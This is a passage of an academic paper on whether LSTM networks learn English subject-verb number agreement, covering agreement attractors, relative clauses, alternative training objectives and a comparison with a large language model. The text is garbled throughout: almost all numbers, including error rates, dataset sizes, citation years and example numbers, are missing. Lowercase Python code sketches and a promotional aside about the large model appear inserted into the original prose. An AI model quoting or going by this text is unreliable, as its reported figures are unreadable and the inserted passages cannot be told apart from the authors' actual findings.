mistakes as the number prediction model on these harder cases. these results suggest that explicit supervision is necessary for learning the agreement dependency using this architecture, limiting its plau- sibility as a model of child language acquisition (el- man, ). from a more applied perspective, this result suggests that for tasks in which it is desirable to capture syntactic dependencies (e.g., machine trans- lation or language generation), language modeling objectives should be supplemented by supervision signals that directly capture the desired behavior. background: subject-verb agreement as evidence for syntactic structure the form of an english third-person present tense verb depends on whether the head of the syntactic subject is plural or singular: ( ) a. the key is on the table. b. *the key are on the table. c. *the keys is on the table. d. the keys are on the table. while in these examples the subject’s head is adjacent to the verb, in general the two can be separated by some sentential material: identifying the head of the subject is typically straightfor- ward. in what follows we will use the shorthand “the subject” to refer to the head of the subject. in the examples, the subject and the corresponding verb are marked in boldface, agreement attractors are underlined and intervening nouns of the same number as the subject are marked in italics. asterisks mark unacceptable sentences. 
( ) the keys to the cabinet are on the table. given a syntactic parse of the sentence and a verb, it is straightforward to identify the head of the subject that corresponds to that verb, and use that information to determine the number of the verb (figure ). the keys to the cabinet are on the table det nsubj prep det pobj prep det pobj root figure : the form of the verb is determined by the head of the subject, which is directly connected to it via an nsubj edge. other nouns that intervene between the head of the subject and the verb (here cabinet is such a noun) are irrelevant for determining the form of the verb and need to be ignored. by contrast, models that are insensitive to structure may run into substantial difficulties capturing this de- pendency. one potential issue is that there is no limit to the complexity of the subject np, and any number of sentence-level modifiers and parentheticals—and therefore an arbitrary number of words—can appear between the subject and the verb: ( ) the building on the far right that’s quite old and run down is the kilgore bank building. this property of the dependency entails that it can- not be captured by an n-gram model with a fixed n. rnns are in principle able to capture dependencies of an unbounded length; however, it is an empirical question whether or not they will learn to do so in practice when trained on a natural corpus. a more fundamental challenge that the depen- dency poses for structure-insensitive models is the possibility of agreement attraction errors (bock and miller, ). the correct form in ( ) could be se- lected using simple heuristics such as “agree with the most recent noun”, which are readily available to sequence models. in general, however, such heuris- tics are unreliable, since other nouns can intervene between the subject and the verb in the linear se- quence of the sentence. those intervening nouns can have the same number as the subject, as in ( ), or the opposite number as in ( )-( ): ( ) alluvial soils carried in the floodwaters add nutrients to the floodplains. ( ) the only championship banners that are cur- rently displayed within the building are for national or ncaa championships. ( ) the length of the forewings is - . ( ) yet the ratio of men who survive to the women and children who survive is not clear in this story. intervening nouns with the opposite number from the subject are called agreement attractors. the poten- tial presence of agreement attractors entails that the model must identify the head of the syntactic subject that corresponds to a given verb in order to choose the correct inflected form of that verb. given the difficulty in identifying the subject from the linear sequence of the sentence, dependencies such as subject-verb agreement serve as an argument for structured syntactic representations in humans (everaert et al., ); they may challenge models such as rnns that do not have pre-wired syntac- tic representations. we note that subject-verb num- ber agreement is only one of a number of structure- sensitive dependencies; other examples include nega- tive polarity items (e.g., any) and reflexive pronouns (herself ). nonetheless, a model’s success in learning subject-verb agreement would be highly suggestive of its ability to master hierarchical structure. the number prediction task to what extent can a sequence model learn to be sensi- tive to the hierarchical structure of natural language? to study this question, we propose the number pre- diction task. 
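to make the parse-based criterion above concrete, here is a hedged sketch of reading the number of a verb's subject off a dependency parse, as in the figure. it uses spacy-style attributes purely for illustration; the original work used a different parser, and the model name here is an assumption.

```python
import spacy

nlp = spacy.load("en_core_web_sm")   # any English dependency parser would do

def subject_number(verb_token):
    """Return 'plural' or 'singular' for the head of the verb's subject, or None."""
    for child in verb_token.children:
        if child.dep_ in ("nsubj", "nsubjpass"):
            return "plural" if child.tag_ in ("NNS", "NNPS") else "singular"
    return None

doc = nlp("The keys to the cabinet are on the table.")
for tok in doc:
    if tok.tag_ in ("VBP", "VBZ"):                  # present-tense verb forms
        print(tok.text, "->", subject_number(tok))  # are -> plural
```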
in this task, the model sees the sentence up to but not including a present-tense verb, e.g.:

( ) the keys to the cabinet

it then needs to guess the number of the following verb (a binary choice, either plural or singular). we examine variations on this task in section .

in order to perform well on this task, the model needs to encode the concepts of syntactic number and syntactic subjecthood: it needs to learn that some words are singular and others are plural, and to be able to identify the correct subject. as we have illustrated in section , correctly identifying the subject that corresponds to a particular verb often requires sensitivity to hierarchical syntax.

data: an appealing property of the number prediction task is that we can generate practically unlimited training and testing examples for this task by querying a corpus for sentences with present-tense verbs, and noting the number of the verb. importantly, we do not need to correctly identify the subject in order to create a training or test example. we generated a corpus of ∼ . million number prediction problems based on wikipedia, of which ∼ , ( %) were used for training, ∼ , ( %) for validation, and the remaining ∼ . million ( %) were reserved for testing. the large number of test sentences was necessary to ensure that we had a good variety of test sentences representing less common constructions (see section ). we limited our search to sentences that were shorter than words; whenever a sentence had more than one subject-verb dependency, we selected one of the dependencies at random. code and data are available at http://tallinzen.net/projects/lstm_agreement.

model and baselines: we encode words as one-hot vectors: the model does not have access to the characters that make up the word. those vectors are then embedded into a -dimensional vector space. an lstm with hidden units reads those embedding vectors in sequence; the state of the lstm at the end of the sequence is then fed into a logistic regression classifier. the network is trained in an end-to-end fashion, including the word embeddings. the network was optimized using adam (kingma and ba, ) and early stopping based on validation set error. we trained the number prediction model times with different random initializations, and report accuracy averaged across all runs; the models described in sections and are based on runs, with the exception of the language model, which is slower to train and was trained once. the size of the vocabulary was capped at (after lowercasing); infrequent words were replaced with their part of speech (penn treebank tagset, which explicitly encodes number distinctions), which was the case for . % of all tokens and . % of the subjects.

to isolate the effect of syntactic structure, we also consider a baseline which is exposed only to the nouns in the sentence, in the order in which they appeared originally, and is then asked to predict the number of the following verb. the goal of this baseline is to withhold the syntactic information carried by function words, verbs and other parts of speech. we explore two variations on this baseline: one that only receives common nouns (dogs, pipe), and another that also receives pronouns (he) and proper nouns (france). we refer to these as the noun-only baselines.
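a minimal pytorch sketch of the architecture just described (embeddings read by an lstm whose final state feeds a logistic regression classifier). the sizes (50-dimensional embeddings, 50 hidden units, a vocabulary of 10,000) are illustrative, since the exact values are not shown above; the class and variable names are ours.

```python
import torch
import torch.nn as nn

class NumberPredictor(nn.Module):
    def __init__(self, vocab_size, embed_dim=50, hidden_dim=50):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, embed_dim)
        self.lstm = nn.LSTM(embed_dim, hidden_dim, batch_first=True)
        self.out = nn.Linear(hidden_dim, 1)      # logistic regression over final state

    def forward(self, token_ids):
        emb = self.embed(token_ids)              # (batch, seq_len, embed_dim)
        _, (h_n, _) = self.lstm(emb)             # h_n: (1, batch, hidden_dim)
        return torch.sigmoid(self.out(h_n[-1]))  # P(plural)

model = NumberPredictor(vocab_size=10_000)
prefix = torch.randint(0, 10_000, (1, 5))             # e.g. "the keys to the cabinet"
loss = nn.BCELoss()(model(prefix), torch.ones(1, 1))  # gold label: plural
loss.backward()
```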
number prediction results

overall accuracy: accuracy was very high overall: the system made an incorrect number prediction only in . % of the dependencies. the noun-only baselines performed significantly worse: . % errors for the common-nouns case and . % errors for the all-nouns case. this suggests that function words, verbs and other syntactically informative elements play an important role in the model's ability to correctly predict the verb's number. however, while the noun-only baselines made more than four times as many mistakes as the number prediction system, their still-low absolute error rate indicates that around % of agreement dependencies can be captured based solely on the sequence of nouns preceding the verb. this is perhaps unsurprising: sentences are often short and the verb is often directly adjacent to the subject, making the identification of the subject simple. to gain deeper insight into the syntactic capabilities of the model, then, the rest of this section investigates its performance on more challenging dependencies.

distance: we first examine whether the network shows evidence of generalizing to dependencies where the subject and the verb are far apart. we focus in this analysis on simpler cases where no nouns intervened between the subject and the verb. as figure a shows, performance did not degrade considerably when the distance between the subject and the verb grew up to words (there were very few longer dependencies). this indicates that the network generalized the dependency from the common distances of and to rare distances of and more.

agreement attractors: we next examine how the model's error rate was affected by nouns that intervened between the subject and the verb in the linear order of the sentence. (these properties of the dependencies were identified by parsing the test sentences using the parser described in goldberg and nivre ( ).)

figure : (a-d) error rates of the lstm number prediction model as a function of: (a) distance between the subject and the verb, in dependencies that have no intervening nouns; (b) presence and number of last intervening noun; (c) count of attractors in dependencies with homogeneous intervention; (d) presence of a relative clause with and without an overt relativizer in dependencies with homogeneous intervention and exactly one attractor. all error bars represent % binomial confidence intervals. (e-f) additional plots: (e) count of attractors per dependency in the corpus (note that the y-axis is on a log scale); (f) embeddings of singular and plural nouns, projected onto their first two principal components.

we first focus on whether or not there were any intervening nouns, and if there were, whether the number of the subject differed from the number of the last intervening noun—the type of noun that would trip up the simple heuristic of agreeing with the most recent noun. as figure b shows, a last intervening noun of the same number as the subject increased error rates only moderately, from . % to . % in singular subjects and from % to . % in plural subjects. on the other hand, when the last intervening noun was an agreement attractor, error rates increased by almost an order of magnitude (to . % and .
% respectively). note, however, that even an error rate of . % is quite impressive considering uninformed strategies such as random guessing ( % error rate), always assigning the more common class label ( % error rate, since % of the subjects in our corpus are plu- ral) and the number-of-most-recent-noun heuristic ( % error rate). the noun-only lstm baselines performed much worse in agreement attraction cases, with error rates of . % (common nouns) and % (all nouns). we next tested whether the effect of attractors is cumulative, by focusing on dependencies with multi- ple attractors. to avoid cases in which the effect of an attractor is offset by an intervening noun with the same number as the subject, we restricted our search to dependencies in which all of the intervening nouns had the same number, which we term dependencies with homogeneous intervention. for example, ( ) has homogeneous intervention whereas ( ) does not: ( ) the roses in the vase by the door are red. ( ) the roses in the vase by the chairs are red. figure c shows that error rates increased gradually as more attractors intervened between the subject and the verb. performance degraded quite slowly, how- ever: even with four attractors the error rate was only . %. as expected, the noun-only baselines per- formed significantly worse in this setting, reaching an error rate of up to % (worse than chance) in the case of four attractors. this confirms that syntactic cues are critical for solving the harder cases. relative clauses: we now look in greater detail into the network’s performance when the words that intervened between the subject and verb contained a relative clause. relative clauses with attractors are likely to be fairly challenging, for several rea- sons. they typically contain a verb that agrees with the attractor, reinforcing the misleading cue to noun number. the attractor is often itself a subject of an irrelevant verb, making a potential “agree with the most recent subject” strategy unreliable. finally, the existence of a relative clause is sometimes not overtly indicated by a function word (relativizer), as in ( ) (for comparison, see the minimally different ( )): ( ) the landmarks this article lists here are also run-of-the-mill and not notable. ( ) the landmarks that this article lists here are also run-of-the-mill and not notable. for data sparsity reasons we restricted our attention to dependencies with a single attractor and no other intervening nouns. as figure d shows, attraction errors were more frequent in dependencies with an overt relative clause ( . % errors) than in dependen- cies without a relative clause ( . %), and consider- ably more frequent when the relative clause was not introduced by an overt relativizer ( %). as in the case of multiple attractors, however, while the model struggled with the more difficult dependencies, its performance was much better than random guessing, and slightly better than a majority-class strategy. word representations: we explored the - dimensional word representations acquired by the model by performing a principal component anal- ysis. we assigned a part-of-speech (pos) to each word based on the word’s most common pos in the corpus. we only considered relatively unambiguous words, in which a single pos accounted for more than % of the word’s occurrences in the corpus. 
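a small sketch of the kind of inspection described above: project the learned embeddings with pca and check whether the leading component separates singular from plural nouns. the embedding matrix and tag assignments below are random placeholders standing in for quantities extracted from a trained model.

```python
import numpy as np
from sklearn.decomposition import PCA

# stand-ins: embeddings from the trained model and each word's most common PTB tag
embeddings = np.random.randn(10_000, 50)
pos_tags = np.random.choice(["NN", "NNS", "VB"], size=10_000)

nouns = np.isin(pos_tags, ["NN", "NNS"])
projected = PCA(n_components=2).fit_transform(embeddings[nouns])

plural = pos_tags[nouns] == "NNS"
print("mean PC1, singular nouns:", projected[~plural, 0].mean())
print("mean PC1, plural nouns:  ", projected[plural, 0].mean())
```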
figure f shows that the first principal component corresponded almost perfectly to the expected number of the noun, suggesting that the model learned the number of specific words very well; recall that the model did not have access during training to noun number annotations or to morphological suffixes such as -s that could be used to identify plurals.

visualizing the network's activations: we start investigating the inner workings of the number prediction network by analyzing its activation in response to particular syntactic constructions. to simplify the analysis, we deviate from our practice in the rest of this paper and use constructed sentences. we first constructed sets of sentence prefixes based on the following patterns:

( ) pp: the toy(s) of the boy(s)...
( ) rc: the toy(s) that the boy(s)...

these patterns differ by exactly one function word, which determines the type of the modifier of the main clause subject: a prepositional phrase (pp) in the first sentence and a relative clause (rc) in the second. in pp sentences the correct number of the upcoming verb is determined by the main clause subject toy(s); in rc sentences it is determined by the embedded subject boy(s). we generated all four versions of each pattern, and repeated the process ten times with different lexical items (the house(s) of/that the girl(s), the computer(s) of/that the student(s), etc.), for a total of sentences.

the network made correct number predictions for all pp sentences, but made three errors in rc sentences. we averaged the word-by-word activations across all sets of ten sentences that had the same combination of modifier (pp or rc), first noun number and second noun number. plots of the activation of all units are provided in the appendix (figure ). figure a highlights a unit (unit ) that shows a particularly clear pattern: it tracks the number of the main clause subject throughout the pp modifier; by contrast, it resets when it reaches the relativizer that which introduces the rc modifier, and then switches to tracking the number of the embedded subject.

to explore how the network deals with dependencies spanning a larger number of words, we tracked its activation during the processing of the following two sentences:

( ) the houses of/that the man from the office across the street...

(we simplified this experiment in light of the relative robustness of the first experiment to lexical items and to whether each of the nouns was singular or plural.) the network made the correct prediction for the pp but not the rc sentence (as before, the correct predictions are plural for pp and singular for rc). figure b shows that the network begins by making the correct prediction for rc immediately after that, but then falters: as the sentence goes on, the resetting effect of that diminishes.

figure : word-by-word visualization of lstm activation: (a) a unit that correctly predicts the number of an upcoming verb. this number is determined by the first noun (x) when the modifier is a prepositional phrase (pp) and by the second noun (y) when it is an object relative clause (rc); (b) the evolution of the predictions in the case of a longer modifier: the predictions correctly diverge at the embedded noun, but then incorrectly converge again; (c) the activation of four representative units over the course of the same sentences.
the activation time courses shown in figure c illustrate that unit , which identified the subject correctly when the prefix was short, gradually forgets that it is in an embedded clause as the prefix grows longer. by contrast, unit shows a stable capacity to remember the current embedding status. additional representative units shown in figure c are unit , which consistently stores the number of the main clause subject, and unit , which tracks the number of the most recent noun, resetting at noun phrase boundaries. while the interpretability of these patterns is encouraging, our analysis only scratches the surface of the rich possibilities of a linguistically-informed analysis of a neural network trained to perform a syntax-sensitive task; we leave a more extensive investigation for future work.

alternative training objectives

the number prediction task followed a fully supervised objective, in which the network identifies the number of an upcoming verb based only on the words preceding the verb. this section proposes three objectives that modify some of the goals and assumptions of the number prediction objective (see table for an overview).

table : examples of the four training objectives and corresponding prediction tasks.
training objective | sample input | training signal | prediction task | correct answer
number prediction | the keys to the cabinet | plural | singular/plural? | plural
verb inflection | the keys to the cabinet [is/are] | plural | singular/plural? | plural
grammaticality | the keys to the cabinet are here. | grammatical | grammatical/ungrammatical? | grammatical
language model | the keys to the cabinet | are | p(are) > p(is)? | true

verb inflection: this objective is similar to number prediction, with one difference: the network receives not only the words leading up to the verb, but also the singular form of the upcoming verb (e.g., writes). in practice, then, the network needs to decide between the singular and plural forms of a particular verb (writes or write). having access to the semantics of the verb can help the network identify the noun that serves as its subject without using the syntactic subjecthood criteria. for example, in the following sentence:

( ) people from the capital often eat pizza.

only people is a plausible subject for eat; the network can use this information to infer that the correct form of the verb is eat rather than eats. this objective is similar to the task that humans face during language production: after the speaker has decided to use a particular verb (e.g., write), he or she needs to decide whether its form will be write or writes (levelt et al., ; staub, ).

grammaticality judgments: the previous objectives explicitly indicate the location in the sentence in which a verb can appear, giving the network a cue to syntactic clause boundaries. they also explicitly direct the network's attention to the number of the verb. as a form of weaker supervision, we experimented with a grammaticality judgment objective. in this scenario, the network is given a complete sentence, and is asked to judge whether or not it is grammatical. to train the network, we made half of the examples in our training corpus ungrammatical by flipping the number of the verb. (in some sentences this will not in fact result in an ungrammatical sentence, e.g. with collective nouns such as group, which are compatible with both singular and plural verbs in some dialects of english (huddleston and pullum, ); those cases appear to be rare.) the network read the entire sentence and received a supervision signal at the end. this task is modeled after a common human data collection technique in linguistics (schütze, ), although our training regime is of course very different to the training that humans are exposed to: humans rarely receive ungrammatical sentences labeled as such (bowerman, ).
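a minimal sketch of how such grammaticality-judgment training pairs can be generated by corrupting half of the sentences, assuming the position and both forms of the agreeing verb are known from the corpus annotation; the helper names are ours, not the authors'.

```python
import random

def make_grammaticality_example(tokens, verb_index, singular_form, plural_form,
                                rng=random):
    """With probability 0.5, flip the number of the verb and label the sentence
    ungrammatical. Only the sentence-level label is kept; the verb position is
    not revealed to the model."""
    tokens = list(tokens)
    if rng.random() < 0.5:
        current = tokens[verb_index]
        tokens[verb_index] = singular_form if current == plural_form else plural_form
        return tokens, "ungrammatical"
    return tokens, "grammatical"

sentence = ["the", "keys", "to", "the", "cabinet", "are", "here", "."]
print(make_grammaticality_example(sentence, verb_index=5,
                                  singular_form="is", plural_form="are"))
```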
language modeling (lm): finally, we experimented with a word prediction objective, in which the model did not receive any grammatically relevant supervision (elman, ; elman, ). in this scenario, the goal of the network is to predict the next word at each point in every sentence. it receives unlabeled sentences and is not specifically instructed to attend to the number of the verb. in the network that implements this training scenario, rnn activation after each word is fed into a fully connected dense layer followed by a softmax layer over the entire vocabulary.

we evaluate the knowledge that the network has acquired about subject-verb number agreement using a task similar to the verb inflection task. to perform the task, we compare the probabilities that the model assigns to the two forms of the verb that in fact occurred in the corpus (e.g., write and writes), and select the form with the higher probability. as this task is not part of the network's training objective, and the model needs to allocate considerable resources to predicting each word in the sentence, we expect the lm to perform worse than the explicitly supervised objectives.

results: when considering all agreement dependencies, all models achieved error rates below % (figure a); as mentioned above, even the noun-only number prediction baselines achieved error rates below % on this task. at the same time, there were large differences in accuracy across training objectives. the verb inflection network performed slightly but significantly better than the number prediction one ( . % compared to . % errors), suggesting that the semantic information carried by the verb is moderately helpful. the grammaticality judgment objective performed somewhat worse, at . % errors, but still outperformed the noun-only baselines by a large margin, showing the capacity of the lstm architecture to learn syntactic dependencies even given fairly indirect evidence.

one could also imagine performing the equivalent of the number prediction task by aggregating lm probability mass over all plural verbs and all singular verbs. this approach may be more severely affected by part-of-speech ambiguous words than the one we adopted; we leave the exploration of this approach to future work.
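the lm evaluation described above reduces to comparing two next-word probabilities at the verb's position. a hedged sketch follows, where lm_next_word_probs stands in for whatever interface the trained model exposes; the toy model is purely illustrative.

```python
def lm_prefers_correct_form(prefix_tokens, correct_form, wrong_form,
                            lm_next_word_probs):
    """lm_next_word_probs(prefix) -> dict of next-word probabilities;
    a stand-in for the trained language model's softmax output."""
    probs = lm_next_word_probs(prefix_tokens)
    return probs.get(correct_form, 0.0) > probs.get(wrong_form, 0.0)

# toy stand-in model that is misled by the most recent noun ("cabinet")
def toy_lm(prefix):
    return {"are": 0.4, "is": 0.6}

print(lm_prefers_correct_form(["the", "keys", "to", "the", "cabinet"],
                              correct_form="are", wrong_form="is",
                              lm_next_word_probs=toy_lm))   # False: attraction error
```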
figure : alternative tasks and additional experiments: (a) overall error rate across tasks (note that the y-axis ends in %); (b) effect of count of attractors in homogeneous dependencies across training objectives; (c) comparison of the google lm (jozefowicz et al., ) to our lm and one of our supervised verb inflection systems, on a sample of sentences; (d) number prediction: effect of count of attractors using srns with standard training or lstm with targeted training; (e) number prediction: difference in error rate between singular and plural subjects across rnn cell types. error bars represent binomial % confidence intervals.

the worst performer was the language model. it made eight times as many errors as the original number prediction network ( . % compared to . %), and did substantially worse than the noun-only baselines (though recall that the noun-only baselines were still explicitly trained to predict verb number). the differences across the networks are more striking when we focus on dependencies with agreement attractors (figure b). here, the language model does worse than chance in the most difficult cases, and only slightly better than the noun-only baselines. the worse-than-chance performance suggests that attractors actively confuse the networks rather than cause them to make a random decision. the other models degrade more gracefully with the number of agreement attractors; overall, the grammaticality judgment objective is somewhat more difficult than the number prediction and verb inflection ones. in summary, we conclude that while the lstm is capable of learning syntax-sensitive agreement dependencies under various objectives, the language-modeling objective alone is not sufficient for learning such dependencies, and a more direct form of training signal is required.

comparison to a large-scale language model: one objection to our language modeling result is that our lm faced a much harder objective than our other models—predicting a distribution over , vocabulary items is certainly harder than binary classification—but was equipped with the same capacity ( -dimensional hidden state and word vectors). would the performance gap between the lm and the explicitly supervised models close if we increased the capacity of the lm?

we address this question using a very large publicly available lm (jozefowicz et al., ), which we refer to as the google lm. the google lm represents the current state-of-the-art in language modeling: it is trained on a billion-word corpus (chelba et al., ), with a vocabulary of , words. it is based on a two-layer lstm with units in each layer, or more than times as many units as our lm; at . billion parameters it has almost times as many parameters. (the google lm is available at https://github.com/tensorflow/models/tree/master/lm_ b.) it is a fine-tuned language model that achieves impressive perplexity scores on common benchmarks, requires a massive infrastructure for training, and pushes the boundaries of what's feasible with current hardware.

we tested the google lm with the methodology we used to test ours. due to computational resource limitations, we did not evaluate it on the entire test set, but sampled a random selection of sentences for each count of attractors (testing a single sentence under the google lm takes around seconds on average). the results are presented in figure c, where they are compared to the performance of the supervised verb inflection system.
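a small sketch of the stratified evaluation sample just described (a fixed number of randomly chosen test dependencies for each attractor count); the field and function names are illustrative.

```python
import random
from collections import defaultdict

def sample_by_attractor_count(dependencies, per_bucket, seed=0):
    """dependencies: iterable of dicts with an 'attractors' count field.
    Returns up to `per_bucket` randomly chosen items for each count."""
    rng = random.Random(seed)
    buckets = defaultdict(list)
    for dep in dependencies:
        buckets[dep["attractors"]].append(dep)
    return {count: rng.sample(items, min(per_bucket, len(items)))
            for count, items in buckets.items()}

test_deps = [{"sentence": f"s{i}", "attractors": i % 5} for i in range(1000)]
sample = sample_by_attractor_count(test_deps, per_bucket=3)
print({k: len(v) for k, v in sorted(sample.items())})
```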
despite having an order of magnitude more parameters and significantly larger training data, the google lm performed poorly compared to the supervised models; even a single attractor led to a sharp increase in error rate to . %, almost as high as our small-scale lm ( . % on the same sentences). while additional attractors caused milder degradation than in our lm, the performance of the google lm on sentences with four attractors was still worse than always guessing the majority class (singular). in summary, our experiments with the google lm do not change our conclusions: the contrast between the poor performance of the lms and the strong per- formance of the explicitly supervised objectives sug- gests that direct supervision has a dramatic effect on the model’s ability to learn syntax-sensitive de- pendencies. given that the google lm was already trained on several hundred times more data than the number prediction system, it appears unlikely that its relatively poor performance was due to lack of training data. additional experiments comparison to simple recurrent networks: how much of the success of the network is due to the lstm cells? we repeated the number prediction experiment with a simple recurrent network (srn) (elman, ), with the same number of hidden units. the srn’s performance was inferior to the one technical exception was that we did not replace low- frequency words with their part-of-speech, since the google lm is a large-vocabulary language model, and does not have parts-of-speech as part of its vocabulary. lstm’s, but the average performance for a given number of agreement attractors does not suggest a qualitative difference between the cell types: the srn makes about twice as many errors as the lstm across the board (figure d). training only on difficult dependencies: only a small proportion of the dependencies in the corpus had agreement attractors (figure e). would the network generalize better if dependencies with in- tervening nouns were emphasized during training? we repeated our number prediction experiment, this time training the model only on dependencies with at least one intervening noun (of any number). we doubled the proportion of training sentences to %, since the total size of the corpus was smaller ( k dependencies). this training regime resulted in a % decrease in error rate on dependencies with exactly one attractor (from . % to . %). this decrease is statistically sig- nificant, and encouraging given that the total number of dependencies in training was much lower, which complicates the learning of word embeddings. error rates mildly decreased in dependencies with more attractors as well, suggesting some generalization (figure d). surprisingly, a similar experiment us- ing the grammaticality judgment task led to a slight increase in error rate. while tentative at this point, these results suggest that oversampling difficult train- ing cases may be beneficial; a curriculum progressing from easier to harder dependencies (elman, ) may provide additional gains. error analysis singular vs. plural subjects: most of the nouns in english are singular: in our corpus, the fraction of singular subjects is %. agreement attraction errors in humans are much more common when the attractor is plural than when it is singular (bock and miller, ; eberhard et al., ). do our models’ error rates depend on the number of the subject? 
as figure b shows, our lstm number prediction model makes somewhat more agreement attraction errors with plural than with singular attractors; the difference is statistically significant, but the asymmetry is much less pronounced than in humans. interestingly, the srn version of the model does show a large asymmetry, especially as the count of attractors increases; with four plural attractors the error rate reaches % (figure e).

qualitative analysis: we manually examined a sample of cases in which the majority of the runs of the number prediction network made the wrong prediction. there were only such dependencies (about . %). many of those were straightforward agreement attraction errors; others were difficult to interpret. we mention here three classes of errors that can motivate future experiments.

the networks often misidentified the heads of noun-noun compounds. in ( ), for example, the models predict a singular verb even though the number of the subject conservation refugees should be determined by its head refugees. this suggests that the networks didn't master the structure of english noun-noun compounds.

( ) conservation refugees live in a world colored in shades of gray; limbo.
( ) information technology (it) assets commonly hold large volumes of confidential data.

some verbs that are ambiguous with plural nouns seem to have been misanalyzed as plural nouns and consequently act as attractors. the models predicted a plural verb in the following two sentences even though neither of them has any plural nouns, possibly because of the ambiguous verbs drives and lands:

( ) the ship that the player drives has a very high speed.
( ) it was also to be used to learn if the area where the lander lands is typical of the surrounding terrain.

other errors appear to be due to difficulty not in identifying the subject but in determining whether it is plural or singular. in example ( ), in particular, there is very little information in the left context of the subject paragraphs suggesting that the writer considers it to be singular (the dependencies are presented as they appeared in the corpus; the predicted number was the opposite of the correct one, e.g., singular in ( ), where the original is plural):

( ) rabaul-based japanese aircraft make three dive-bombing attacks.
( ) the lead is also rather long; paragraphs is pretty lengthy for a kilobyte article.

the last errors point to a limitation of the number prediction task, which jointly evaluates the model's ability to identify the subject and its ability to assign the correct number to noun phrases.

related work

the majority of nlp work on neural networks evaluates them on their performance in a task such as language modeling or machine translation (sundermeyer et al., ; bahdanau et al., ). these evaluation setups average over many different syntactic constructions, making it difficult to isolate the network's syntactic capabilities. other studies have tested the capabilities of rnns to learn simple artificial languages. gers and schmidhuber ( ) showed that lstms can learn the context-free language aⁿbⁿ, generalizing to ns as high as even when trained only on n ∈ { , . . . , }. simple recurrent networks struggled with this language (rodriguez et al., ; rodriguez, ). these results have been recently replicated and extended by joulin and mikolov ( ).
elman ( ) tested an srn on a miniature lan- guage that simulated english relative clauses, and found that the network was only able to learn the language under highly specific circumstances (el- man, ), though later work has called some of his conclusions into question (rohde and plaut, ; cartling, ). frank et al. ( ) studied the ac- quisition of anaphora coreference by srns, again in a miniature language. recently, bowman et al. ( ) tested the ability of lstms to learn an artifi- cial language based on propositional logic. as in our study, the performance of the network degraded as the complexity of the test sentences increased. karpathy et al. ( ) present analyses and visual- ization methods for character-level rnns. kádár et al. ( ) and li et al. ( ) suggest visualization techniques for word-level rnns trained to perform tasks that aren’t explicitly syntactic (image caption- ing and sentiment analysis). early work that used neural networks to model grammaticality judgments includes allen and sei- denberg ( ) and lawrence et al. ( ). more re- cently, the connection between grammaticality judg- ments and the probabilities assigned by a language model was explored by clark et al. ( ) and lau et al. ( ). finally, arguments for evaluating nlp models on a strategically sampled set of dependency types rather than a random sample of sentences have been made in the parsing literature (rimell et al., ; nivre et al., ; bender et al., ). discussion and future work neural network architectures are typically evaluated on random samples of naturally occurring sentences, e.g., using perplexity on held-out data in language modeling. since the majority of natural language sen- tences are grammatically simple, models can achieve high overall accuracy using flawed heuristics that fail on harder cases. this makes it difficult to distin- guish simple but robust sequence models from more expressive architectures (socher, ; grefenstette et al., ; joulin and mikolov, ). our work suggests an alternative strategy—evaluation on natu- rally occurring sentences that are sampled based on their grammatical complexity—which can provide more nuanced tests of language models (rimell et al., ; bender et al., ). this approach can be extended to the training stage: neural networks can be encouraged to develop more sophisticated generalizations by oversampling grammatically challenging training sentences. we took a first step in this direction when we trained the network only on dependencies with intervening nouns (section ). this training regime indeed im- proved the performance of the network; however, the improvement was quantitative rather than qualitative: there was limited generalization to dependencies that were even more difficult than those encountered in training. further experiments are needed to establish the efficacy of this method. a network that has acquired syntactic represen- tations sophisticated enough to handle subject-verb agreement is likely to show improved performance on other structure-sensitive dependencies, including pronoun coreference, quantifier scope and negative polarity items. as such, neural models used in nlp applications may benefit from grammatically sophis- ticated sentence representations developed in a multi- task learning setup (caruana, ), where the model is trained concurrently on the task of interest and on one of the tasks we proposed in this paper. of course, grammatical phenomena differ from each other in many ways. 
the distribution of negative polarity items is highly sensitive to semantic factors (gian- nakidou, ). restrictions on unbounded depen- dencies (ross, ) may require richer syntactic representations than those required for subject-verb dependencies. the extent to which the results of our study will generalize to other constructions and other languages, then, is a matter for empirical research. humans occasionally make agreement attraction mistakes during language production (bock and miller, ) and comprehension (nicol et al., ). these errors persist in human acceptability judg- ments (tanner et al., ), which parallel our gram- maticality judgment task. cases of grammatical agreement with the nearest rather than structurally rel- evant constituent have been documented in languages such as slovenian (marušič et al., ), and have even been argued to be occasionally grammatical in english (zwicky, ). in future work, explor- ing the relationship between these cases and neural network predictions can shed light on the cognitive plausibility of those networks. conclusion lstms are sequence models; they do not have built- in hierarchical representations. we have investigated how well they can learn subject-verb agreement, a phenomenon that crucially depends on hierarchical syntactic structure. when provided explicit supervi- sion, lstms were able to learn to perform the verb- number agreement task in most cases, although their error rate increased on particularly difficult sentences. we conclude that lstms can learn to approximate structure-sensitive dependencies fairly well given ex- plicit supervision, but more expressive architectures may be necessary to eliminate errors altogether. fi- nally, our results provide evidence that the language modeling objective is not by itself sufficient for learn- ing structure-sensitive dependencies, and suggest that a joint training objective can be used to supplement language models on tasks for which syntax-sensitive dependencies are important. acknowledgments we thank marco baroni, grzegorz chrupała, alexan- der clark, sol lago, paul smolensky, benjamin spector and roberto zamparelli for comments and discussion. this research was supported by the european research council (grant erc- -adg bootphon), the agence nationale pour la recherche (grants anr- -idex- - psl and anr- -labx- iec) and the israeli science foundation (grant number / ). references joseph allen and mark s. seidenberg. . the emer- gence of grammaticality in connectionist networks. in brian macwhinney, editor, emergentist approaches to language: proceedings of the th carnegie sym- posium on cognition, pages – . mahwah, nj: erlbaum. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in international conference for learning representations. emily m. bender, dan flickinger, stephan oepen, and yi zhang. . parser evaluation over local and non-local deep dependencies in a large corpus. in pro- ceedings of emnlp, pages – . kathryn bock and carol a. miller. . broken agree- ment. cognitive psychology, ( ): – . melissa bowerman. . the “no negative evidence” problem: how do children avoid constructing an overly general grammar? in john a. hawkins, editor, explain- ing language universals, pages – . oxford: basil blackwell. samuel r. bowman, christopher d. manning, and christopher potts. . tree-structured composi- tion in neural networks without tree-structured archi- tectures. 
